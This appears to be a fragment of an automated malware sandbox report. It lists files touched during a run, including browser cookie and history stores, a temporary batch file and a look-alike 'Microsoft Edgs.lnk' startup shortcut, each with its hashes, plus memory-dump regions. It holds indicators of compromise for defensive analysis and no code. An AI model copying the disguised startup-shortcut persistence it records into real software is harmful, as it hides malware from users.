                                                                                                4699916bdfa5776d72ad2643fad072a7a19783900608290bd1246a19624d61b58a1d80eceb74215b7198aaf04c526fa8703d38f3c5fdcc1add19b87508685ce0

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                152B

                                                                                                MD5

                                                                                                95ba0df0c4c417ae5a52c277e5f43b64

                                                                                                SHA1

                                                                                                7c3bf3447551678f742cc311cd4cf7b2a99ab3be

                                                                                                SHA256

                                                                                                fdaa82c65558793b81117a66acd5645d4072f6b71f164ed2717a17cab6e727ea

                                                                                                SHA512

                                                                                                fcb35a1949664f218ae40c25fd6eaefc4ba6417034a522f0800c50ee78e530c33080faa73ff9ea82f35749d404d6b9c94fc7e8e224689503e699a5ec2b0d5abb

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3b9d131e-f9c8-43d5-a01a-cd78c24734cc.tmp

                                                                                                Filesize

                                                                                                59B

                                                                                                MD5

                                                                                                2800881c775077e1c4b6e06bf4676de4

                                                                                                SHA1

                                                                                                2873631068c8b3b9495638c865915be822442c8b

                                                                                                SHA256

                                                                                                226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974

                                                                                                SHA512

                                                                                                e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

                                                                                                Filesize

                                                                                                215KB

                                                                                                MD5

                                                                                                d79b35ccf8e6af6714eb612714349097

                                                                                                SHA1

                                                                                                eb3ccc9ed29830df42f3fd129951cb8b791aaf98

                                                                                                SHA256

                                                                                                c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

                                                                                                SHA512

                                                                                                f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

                                                                                                Filesize

                                                                                                36KB

                                                                                                MD5

                                                                                                605ec9e39a81eaa10dbe8a1b9ef7380f

                                                                                                SHA1

                                                                                                0de2257495a7c8d8fcf7982ae4fafb76b19056d9

                                                                                                SHA256

                                                                                                83f7e346bbf98f646a5926958790fcbbee3d662074fa3d4ed26c33b01a32cf1d

                                                                                                SHA512

                                                                                                a593f5a1a28627ca564f553c60e4baf413b43167eb0d9579c59d543198a9cee7d14d9119230852ec2ec6bb7d41af5496cdb7ca51797ff67fe91796a06b63739d

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

                                                                                                Filesize

                                                                                                27KB

                                                                                                MD5

                                                                                                6b5c5bc3ac6e12eaa80c654e675f72df

                                                                                                SHA1

                                                                                                9e7124ce24650bc44dc734b5dc4356a245763845

                                                                                                SHA256

                                                                                                d1d3f1ebec67cc7dc38ae8a3d46a48f76f39755bf7d78eb1d5f20e0608c40b81

                                                                                                SHA512

                                                                                                66bd618ca40261040b17d36e6ad6611d8180984fd7120ccda0dfe26d18b786dbf018a93576ebafe00d3ce86d1476589c7af314d1d608b843e502cb481a561348

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                Filesize

                                                                                                3KB

                                                                                                MD5

                                                                                                6743d2bcf20dc3e98d07de4a01475823

                                                                                                SHA1

                                                                                                18f7d7bf13bb2cd82627fa3680be86e657ac9f45

                                                                                                SHA256

                                                                                                bae0a2c8f8135edb849359721cadeaaab6f6bc2eb58e506906137281f4283e57

                                                                                                SHA512

                                                                                                934e9e8da8afe3be1431cb6d16cb53e90f21f9e715fb128f574106dcce1dac5163a3b80df5b8d4802f412c00c91a4b631c1bcf73356e66d3f6aca6d401d242e7

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                Filesize

                                                                                                48B

                                                                                                MD5

                                                                                                68b05d5c9deb7315cb4edebb4a9226aa

                                                                                                SHA1

                                                                                                41d94bf8c01ca83b6988d3421f1c9494a0acb8a6

                                                                                                SHA256

                                                                                                1a590acf743e712ecc79f62a1206acaeeb073d4db7f444345d3b750129fedce1

                                                                                                SHA512

                                                                                                85da1459e24d38bedc385ee13beb00e3a66a9a3cd71dc5ac45677fd26d8b4ffac518a13914dd8916a3a509f59db9e1eee4cdbba7972aba154efcd6fe9b9b1117

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                Filesize

                                                                                                2KB

                                                                                                MD5

                                                                                                fdc36e13e5aa282a3f8d9ef81a56e107

                                                                                                SHA1

                                                                                                179573e98480722191aebd91236c092394a4b586

                                                                                                SHA256

                                                                                                b7e7790ebe0ccb64d18b39f6b2b074e33d5688d2f5bd1014a630cb74e7af0745

                                                                                                SHA512

                                                                                                2cfebb5118503f68ba54624408a824b70a88100fe7ec30f3fe8435b390e8b1ccc2a1a79b468cc26e65e0bd4bdf718251b1b7480ad863e8d1ad84c2ecbf5ce3ef

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

                                                                                                Filesize

                                                                                                28KB

                                                                                                MD5

                                                                                                5691b576a1a2c82f20ac3a3cfd2b3b58

                                                                                                SHA1

                                                                                                8079082b806f3fb4a04e5c6fd51c24c9c97c2d37

                                                                                                SHA256

                                                                                                74a0ac70b9ce7bedd032a75d3340eb56e3893a5b3131a8e64c441a97b8ae0461

                                                                                                SHA512

                                                                                                8eab0d33e9bd306456626f05227914003e8c6feb76d7651b80141092087ffb8c61c0ec7a6f04543ae6d222e3142d22ae9aea53ac0d478301677f11c131671454

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                                                                                Filesize

                                                                                                70KB

                                                                                                MD5

                                                                                                e5e3377341056643b0494b6842c0b544

                                                                                                SHA1

                                                                                                d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                                                                                SHA256

                                                                                                e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                                                                                SHA512

                                                                                                83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001

                                                                                                Filesize

                                                                                                41B

                                                                                                MD5

                                                                                                5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                SHA1

                                                                                                d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                SHA256

                                                                                                f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                SHA512

                                                                                                de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                Filesize

                                                                                                124KB

                                                                                                MD5

                                                                                                122f5d59f78f57bd5c1b2eccd3491d13

                                                                                                SHA1

                                                                                                cffb6798f6ec5c4631141ff281a40064569e1c16

                                                                                                SHA256

                                                                                                e24a45a308c97a29e504070952e7b243fe630a648a04aef3667faaf6735c97c0

                                                                                                SHA512

                                                                                                c6efac44ada325b9b00df25738c773bac07339777f609d1b92178110160449fc03af40926a4da47ea6e9ccc141192072183662e25e5b626d55a170f67a0ba447

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                Filesize

                                                                                                2KB

                                                                                                MD5

                                                                                                bace49e62058dbd77f410414509ddadb

                                                                                                SHA1

                                                                                                324be7e2d8632ee5823bc66a4c5d9e37edcd28fe

                                                                                                SHA256

                                                                                                e54be44c182a515f6677102980319cdc08940eedd1a181b8b740bc9ea0ba6224

                                                                                                SHA512

                                                                                                d244a7388630857256f6de4227d7e45083dcacff25aef0eb72c27691d0f906e7326dcbb71972cc410b9f1326f9e3b58e06d425d3c01c4f763a4000c82a200e7a

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                Filesize

                                                                                                2KB

                                                                                                MD5

                                                                                                92c6bd6198150ff6533fba115bf27400

                                                                                                SHA1

                                                                                                561652a0ab3ff68c92b866315bccd03378896f09

                                                                                                SHA256

                                                                                                1cce57f88b0b302794e1d58173ba1376a0bf9f9e012d0bc903e3b4a595e752c2

                                                                                                SHA512

                                                                                                ea73a0f7bad6ece32aa53aec778aa7069d01be8b38557b638c65fcd8ebc9beb435ec9c0a05a1634451d40acdc7842f14a4cff31cbd6f20db454ac45914d5c3ab

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                Filesize

                                                                                                8KB

                                                                                                MD5

                                                                                                61463cd3dee111ee77d196e3966c0f26

                                                                                                SHA1

                                                                                                c48ead2019ef7558cf824273f6baeb5331a3c1d8

                                                                                                SHA256

                                                                                                84381c68eec724478fecf680af40466203318f08548475c3db30a522d01e4eef

                                                                                                SHA512

                                                                                                091e40677a21139ee859909f132552a925e7a9e2d950aad1c3e56f2ffeca3a829d87a5ebfdf6240a8dbd42b00760686588362763715d23662e4da65340e576e4

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                Filesize

                                                                                                5KB

                                                                                                MD5

                                                                                                e993871581afc69b1456494d8b866504

                                                                                                SHA1

                                                                                                0f997bcf99304ceaf7636f1100a6d17431b440d8

                                                                                                SHA256

                                                                                                d9bd557201026a335cadd0e30fcd08d288d75242ae2ccd042d7d86b56fd42314

                                                                                                SHA512

                                                                                                b26b681d658f895f6b91109c96c3e84400c7bf4ba4a18e83199be57927445ff31c0884e03b33a64050ff438cafa76ef4eae92fd4ea2068d71314f9dec6027de0

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                Filesize

                                                                                                7KB

                                                                                                MD5

                                                                                                c44d063fa7e3cd20764d6ecb78a36a2d

                                                                                                SHA1

                                                                                                ac58ce9bf17295c84813612cf256b387c665f7e9

                                                                                                SHA256

                                                                                                1bfbe0149f855cb41ee00ca6dfe42cb650ec5b588ae823115da850ee7b859aa5

                                                                                                SHA512

                                                                                                d7db09aca180c19367c402517518ebdda28bd9ef2eacb7c9e486e8d8ca0151e34c45f32a860fdc31d057078eb549ba61de52c7f63bad07464ade3eeceaaecb31

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                Filesize

                                                                                                8KB

                                                                                                MD5

                                                                                                9e6a641ea2677defef56ec314fd1e1f4

                                                                                                SHA1

                                                                                                60731d0c0025b2a27ecfdbe0efe4fea65407eb36

                                                                                                SHA256

                                                                                                614ce4dd6f8f453b1fcdc86a3291477882bf986a01a498055e4622e2930f34dd

                                                                                                SHA512

                                                                                                7547536e6b34ea4f06261bc2359cedc9b6ce2e3e240a8ae7c47b6bd1e6a9e944952d20bf446c69ecf523fce376c710bc5033f9eb8d529d3bc112e3486f11e201

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                Filesize

                                                                                                5KB

                                                                                                MD5

                                                                                                edf51bc4f9b884bd606a84fc3e401229

                                                                                                SHA1

                                                                                                5ea974a093d12ecdc760445ce52e6fa2cb22e3ae

                                                                                                SHA256

                                                                                                f45c9e084584612e4c3d5acc405cdfed44a9530713014935bc1a0c052393be84

                                                                                                SHA512

                                                                                                6e01ac16bdfdac29f98c4d785d00bb0f04a7647f0a4924f55eda7dbc32fa2a520056655100523ef02eaf5c80edcc76da4e482b5efaa80a0958a98408af48d81b

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                Filesize

                                                                                                8KB

                                                                                                MD5

                                                                                                73eda21f0c4fb0a67cf66d7d0788e9c5

                                                                                                SHA1

                                                                                                00d79e03dc16e286286507714d954576d54533c3

                                                                                                SHA256

                                                                                                535344278e36470d57c51912add9efd3d607cb72806e2129fc6acffbcebc4ede

                                                                                                SHA512

                                                                                                d6f77769e2a0ab23211af3bd875a6b0badcc09e2bed53a025dffa0cd8961f9f0aae2d7cce0be3949e60fab850c39f16ee539a01d6e5994f909c872d9bb257bd2

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                Filesize

                                                                                                24KB

                                                                                                MD5

                                                                                                0493f44576fd7d9b6216b7387a26543e

                                                                                                SHA1

                                                                                                47d35c7f2990ec4668ecf1c01e0e5f623153a3f3

                                                                                                SHA256

                                                                                                0679b6900e2118e17164159f449fdc1f6bf20c0cc0b056cc9aedfae42a830ca8

                                                                                                SHA512

                                                                                                a519962ffb281d471bcf63c0bf75bed19d4eeac591cf6bf8565af14dde1d57fe8cabfc05bec52b2087ce8c6f637dbefb438ce22054895dc116b31bffa18e9cd3

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                Filesize

                                                                                                24KB

                                                                                                MD5

                                                                                                1cc3bc2b1c52831cc0b972d856888e8c

                                                                                                SHA1

                                                                                                9ffa8cf55aa29f6cbdd5ec39b1b33938b29e9990

                                                                                                SHA256

                                                                                                a8f894b23c518e04d94f1bb51343443de8121366171d2f05441283dbb1cfdd2c

                                                                                                SHA512

                                                                                                85bd6789da57c911f9cc35929ab302829614a4f03b3de30e28ab16558279ed02200a7db802c9bcd6b2e5886ea3c323d6a39eb8c3ee309d8b5702be65dab7c3dd

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                Filesize

                                                                                                125KB

                                                                                                MD5

                                                                                                8fca2f332f46b711c9c5f590f16709a3

                                                                                                SHA1

                                                                                                384fce4e1e284f2a3d303490ccdc73087adb7ba3

                                                                                                SHA256

                                                                                                3d8b26f6a1cc37f9020fb7fe66ae27087b0da27d8de5ab4ea62302eed4b489a2

                                                                                                SHA512

                                                                                                45cfe3feca234a7aa73de7c62c1685fa570ffe6930fe8495d6042cb40e24079d662f63477bae1629d471db47dc5be5627cecc0d78a4f97f5113a283e4d463dec

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                                                Filesize

                                                                                                72B

                                                                                                MD5

                                                                                                ac327ba1708cf68f1d343ff754ec227a

                                                                                                SHA1

                                                                                                eb34cc58ee5c8fb14e1541a29b831c245cd20f59

                                                                                                SHA256

                                                                                                dab9e573d00684549f4a2e982ae871450d70c674dc6e1d9135d49f199b8f9d48

                                                                                                SHA512

                                                                                                039699ce647d3e605b5221842baf3ea7e00f8328086a6057868246ddadc02a5a052d18f5daecaba71447d67c1d87d1276d1867c1868210f6e25d0d62c015299f

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe582c4b.TMP

                                                                                                Filesize

                                                                                                48B

                                                                                                MD5

                                                                                                8f0811e75ee9ce7467ecb0911d254731

                                                                                                SHA1

                                                                                                d9e802ca42e3d29db2e1ed0f1fb9ea042afbb441

                                                                                                SHA256

                                                                                                6b1fb66a90054fc9df695ebe1b648dce002a42d49576ac66652a3d6cf122887a

                                                                                                SHA512

                                                                                                784afdf36b9397b4791f91d2424cf96c39689c1769d16d0a9b91ed55ae216d44a8cc7fbf47f6ab1431236804eb115984422baa0000d7e3d679e469a16fb40ae0

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                Filesize

                                                                                                116KB

                                                                                                MD5

                                                                                                57aed3276d4270d1e5d557d990288938

                                                                                                SHA1

                                                                                                2a1a7f68a881d7e649832b2bd12c9a16d5364551

                                                                                                SHA256

                                                                                                425a806d9cd4458ddc32ed4f1f7d3df38bfbce67225a77282091723b00a962b3

                                                                                                SHA512

                                                                                                2190ce58b3d6f3cc17e3b44d698246c3c7e4fc3f60d5068ed46f0e2e9ac362f03b0e1c24a1b3b0974cd5be48995d51a7aed708d4ba5c21ddda582ce1fd5f081f

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                Filesize

                                                                                                16B

                                                                                                MD5

                                                                                                206702161f94c5cd39fadd03f4014d98

                                                                                                SHA1

                                                                                                bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                SHA256

                                                                                                1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                SHA512

                                                                                                0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

                                                                                                Filesize

                                                                                                16B

                                                                                                MD5

                                                                                                46295cac801e5d4857d09837238a6394

                                                                                                SHA1

                                                                                                44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                SHA256

                                                                                                0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                SHA512

                                                                                                8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                Filesize

                                                                                                11KB

                                                                                                MD5

                                                                                                6ad954e3a099422179fdc30050ca9a42

                                                                                                SHA1

                                                                                                b233995cd4a182e4c6398ae8e53e228af30c109a

                                                                                                SHA256

                                                                                                b1ea0a11dcfa9b2884b9f3f24e91dfe2079bf34921502c698c20d95ab4610368

                                                                                                SHA512

                                                                                                3c60f1596a44cbce3bc17978d3dfe00837199326e070832cad46f960b6c3b0ce356a9b502ec0ebc1e8de289ab517d83c1bcb7b2788d2e9cc1c99969af6a15151

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                Filesize

                                                                                                9KB

                                                                                                MD5

                                                                                                73512947d126ed8076c633a197481409

                                                                                                SHA1

                                                                                                efea504f655487ea8266e589c0a38a10e6327faa

                                                                                                SHA256

                                                                                                d9e48a96e15ab51a706d890ecf0440cbf0c134f95255982e3239003e8b85372c

                                                                                                SHA512

                                                                                                36929fe9da846f383be635c894c2b3645d9c9d3b787aee83e6b666c5f2b702455c3f0b679c7004cf1e8472ac22eb19626de9b5e8b12cb0f280a51e1f6a52e989

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                Filesize

                                                                                                10KB

                                                                                                MD5

                                                                                                bac07d35cc4b51047221cbfcfccb4e06

                                                                                                SHA1

                                                                                                1e4dd989da099491c35bb766c4f73a690536c80d

                                                                                                SHA256

                                                                                                e1abe5be7d997a7b466aa47880a16b48d682921ee34794ce79986701c46cf20b

                                                                                                SHA512

                                                                                                add24452a279895f019193fbc5752b33f2da48868bc93652b5c5a916c59e42bc4cd5d630ac982d819a80e4cf242ce235bdc8ccb3fa89ddf15b4d838437c795d3

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                Filesize

                                                                                                11KB

                                                                                                MD5

                                                                                                6301a2598cccffa932fa3d8f9fccac1c

                                                                                                SHA1

                                                                                                4b9e80042c48edf1a78307597d3ceaba266d28c6

                                                                                                SHA256

                                                                                                adf25e34254ad3bc95d70facfeba73685571dedcdc090a6a9d77a6417398da2c

                                                                                                SHA512

                                                                                                66bfd03bd474ecc943594273e209606c5f8c0cb73a1c244797c8492bdedb2135ca28d074f654accf6710130cc9d5b8bbc23928ca07be33ae5a8483b42af380e5

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                Filesize

                                                                                                11KB

                                                                                                MD5

                                                                                                6e655b3673f8ed8f51e97f8354b82f3a

                                                                                                SHA1

                                                                                                df63c293dfad1c81f94564fcb352995fd8d4d2ef

                                                                                                SHA256

                                                                                                afc33b57bd6b2f94b25e402f6f127cef35eec6b8f2bc658795e77b3f787bdd8c

                                                                                                SHA512

                                                                                                6b3a36b5663a9cf08467d6497e0420d13906053f20a65fe96a8622db22ea438df69d3166a24257e4ad854ad00bb98ab6ffa738ea647f98b2c7c332c078c6fb30

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                Filesize

                                                                                                11KB

                                                                                                MD5

                                                                                                f13f04ad0e0917a824f8e577a3dc6877

                                                                                                SHA1

                                                                                                80b5d935c7f2422389576a5a86931c9b1101eb37

                                                                                                SHA256

                                                                                                78e65176fa9b382f487f5edc259787d3e618d8a1a6b112f564970a589c749101

                                                                                                SHA512

                                                                                                ded0d87183ee79e02fe1b013b3a5443f93a594951fb31490d0dab32dfb638d9f5fa33bcbb88582ed8c4052c47d8eda146f40245be7374be84ab6effd9c2b2f76

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                64B

                                                                                                MD5

                                                                                                d8b9a260789a22d72263ef3bb119108c

                                                                                                SHA1

                                                                                                376a9bd48726f422679f2cd65003442c0b6f6dd5

                                                                                                SHA256

                                                                                                d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

                                                                                                SHA512

                                                                                                550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                1KB

                                                                                                MD5

                                                                                                bd45652619ad4ef85dda374ba22bafed

                                                                                                SHA1

                                                                                                ece4cc7f7489e74d2f0daa9ad9ab8e4912ec429f

                                                                                                SHA256

                                                                                                c1dfb273499b982e1ad00e49ee77b8a4eed6cd0494731d90f54e132fe88d0a87

                                                                                                SHA512

                                                                                                bce4f1911af3856526cbae1a0f129fa2863cf39cc4e52cf73bdcae88d5b93f91114556c2ef7885d96d08eb82db3b70a1b3ce43231fbab68a8d71f2e564b14e90

                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wv0n5sud.k2q.ps1

                                                                                                Filesize

                                                                                                60B

                                                                                                MD5

                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                SHA1

                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                SHA256

                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                SHA512

                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmp82D2.tmp.bat

                                                                                                Filesize

                                                                                                164B

                                                                                                MD5

                                                                                                4576876063481b11d803cc733fdaedbd

                                                                                                SHA1

                                                                                                fa174c0e4ef03d410d88bde025cda805bb7db73d

                                                                                                SHA256

                                                                                                e3abfaad732defabb9dc58ba431887368eecc45e67bc229c5f4f01a98bdc1eaf

                                                                                                SHA512

                                                                                                a7263f996a3187827c74e47b3cff1bdde3bd39689f2bd9b677ae0c592144f95cd961c08185b72820c49b0df30aa9cd0104cf28429b5c53f2c85efb1134f17556

                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                Filesize

                                                                                                3KB

                                                                                                MD5

                                                                                                57dff3cc6a4355f87e2f2c0a3938ebc3

                                                                                                SHA1

                                                                                                5bebfeda8c916ee8759e170e3ef4d0b2436e84fe

                                                                                                SHA256

                                                                                                8db49764045d321e8a73c4fe4a358c440f46b402ec98f44e9973eb3b027b6915

                                                                                                SHA512

                                                                                                a8ecf3a3d512c8c23f05607ec39477243f4f2b746efd571f9322d4cd9c4e50ae0d618e8e308a4eb4c425cdaaa18a7400cb8611c1e5fdc13044235cd219c24c57

                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                Filesize

                                                                                                3KB

                                                                                                MD5

                                                                                                e05a22cc95f4a67d99942a3e0d6d7f20

                                                                                                SHA1

                                                                                                a47db11deae9f9978c731fc8d6146b9154bcaecd

                                                                                                SHA256

                                                                                                f2d0b47c83cc39669403e6eab8542fc5a249451534c91e2dfd1142ca1c2f3de4

                                                                                                SHA512

                                                                                                b3e0c265ae0b4141f1cdb80d7e0bde75e18f40e9071b49627e27a25ab3f3391a1e669e86258f5bf13d4d78e1aeef0374bbace8446c23f2906890a9fefec04ba4

                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edgs.lnk

                                                                                                Filesize

                                                                                                817B

                                                                                                MD5

                                                                                                910c098ec8f3497abefaccfd09d26c1f

                                                                                                SHA1

                                                                                                940dd75a78c3808597eda6bbb6f63aea38cb695d

                                                                                                SHA256

                                                                                                f42d9fe724d6a910b9446520ef2934f0b452e59ed446926e89636599fa9de2ab

                                                                                                SHA512

                                                                                                8f82d511d422e81f967550ab5cb6d1b40c4112ac7243e747b597699eaf514fd5ef9f7f9e52be149547d5d2869157a0139bd6f67fa94739d8e0a646f76b50f657

                                                                                              • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

                                                                                                Filesize

                                                                                                8B

                                                                                                MD5

                                                                                                cf759e4c5f14fe3eec41b87ed756cea8

                                                                                                SHA1

                                                                                                c27c796bb3c2fac929359563676f4ba1ffada1f5

                                                                                                SHA256

                                                                                                c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

                                                                                                SHA512

                                                                                                c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

                                                                                              • C:\Users\Admin\Downloads\Unconfirmed 63358.crdownload

                                                                                                Filesize

                                                                                                74KB

                                                                                                MD5

                                                                                                5b43e7355fd90aff498f34f9c9abe5a0

                                                                                                SHA1

                                                                                                ced829ab27f09bb9316a95617e027dfa052f0955

                                                                                                SHA256

                                                                                                235acf44d2a24f518dc53f3eda92ffb9fbe2546c37d9e5fb951eb282c782f3c7

                                                                                                SHA512

                                                                                                a703c4e821e40361b1da8a1687fbb7e394efa81c19e386f0037b1380e1949f58219cf0b69e8ec1eee068a7cf5667c933437a3382e2f1cc9f20b438df3b35a5c0

                                                                                              • C:\Users\Admin\Downloads\Unconfirmed 659141.crdownload

                                                                                                Filesize

                                                                                                321KB

                                                                                                MD5

                                                                                                7339076fc71f78ab2ba4c6f81326230a

                                                                                                SHA1

                                                                                                005f1944fe741807e733ae4307a3d366c4249478

                                                                                                SHA256

                                                                                                8b151c83a18c5985a5bbc7b4ea7df39719be2ae712d51a617568b4a8a484e7f0

                                                                                                SHA512

                                                                                                9dabde146f124f18bf869e444e59078ba79235671f9829ff1ab648c45b1d5e45dbd4375959a8a4c8cbd76b338be1a4c7278643874fe2f65d6a8d15c286dbc6b0

                                                                                              • C:\Users\Admin\Downloads\Unconfirmed 81125.crdownload

                                                                                                Filesize

                                                                                                60KB

                                                                                                MD5

                                                                                                5b29d55280fbe57e4a9c22c155288061

                                                                                                SHA1

                                                                                                5456a06ad792bac192f961ac4901227f6825084e

                                                                                                SHA256

                                                                                                2ad0b8e8c41f65839f0c2dda4e2a39b0e8a844ec3d67fef7e79a690ab56b4982

                                                                                                SHA512

                                                                                                9ba6d4effb2a304f047149f6fa199607c24338460cdf9c78cfed22d07cb15f087e4d7e28d8bb19949dc4f5a6536b4ad2b4590eb4991ecbad69509411d8236b36

                                                                                              • memory/3504-786-0x0000000000400000-0x0000000000457000-memory.dmp

                                                                                                Filesize

                                                                                                348KB

                                                                                              • memory/3504-748-0x0000000000760000-0x00000000007AB000-memory.dmp

                                                                                                Filesize

                                                                                                300KB

                                                                                              • memory/3544-744-0x0000000000520000-0x0000000000538000-memory.dmp

                                                                                                Filesize

                                                                                                96KB

                                                                                              • memory/4036-893-0x000000001C4E0000-0x000000001C4EC000-memory.dmp

                                                                                                Filesize

                                                                                                48KB

                                                                                              • memory/4036-822-0x000000001DB40000-0x000000001DC60000-memory.dmp

                                                                                                Filesize

                                                                                                1.1MB

                                                                                              • memory/4036-897-0x000000001EBF0000-0x000000001ECA0000-memory.dmp

                                                                                                Filesize

                                                                                                704KB

                                                                                              • memory/4036-790-0x0000000003260000-0x000000000326E000-memory.dmp

                                                                                                Filesize

                                                                                                56KB

                                                                                              • memory/4036-898-0x0000000020650000-0x0000000020B78000-memory.dmp

                                                                                                Filesize

                                                                                                5.2MB

                                                                                              • memory/4036-747-0x0000000000E60000-0x0000000000E76000-memory.dmp

                                                                                                Filesize

                                                                                                88KB

                                                                                              • memory/4692-788-0x000000001D4A0000-0x000000001D516000-memory.dmp

                                                                                                Filesize

                                                                                                472KB

                                                                                              • memory/4692-789-0x00000000014C0000-0x00000000014CE000-memory.dmp

                                                                                                Filesize

                                                                                                56KB

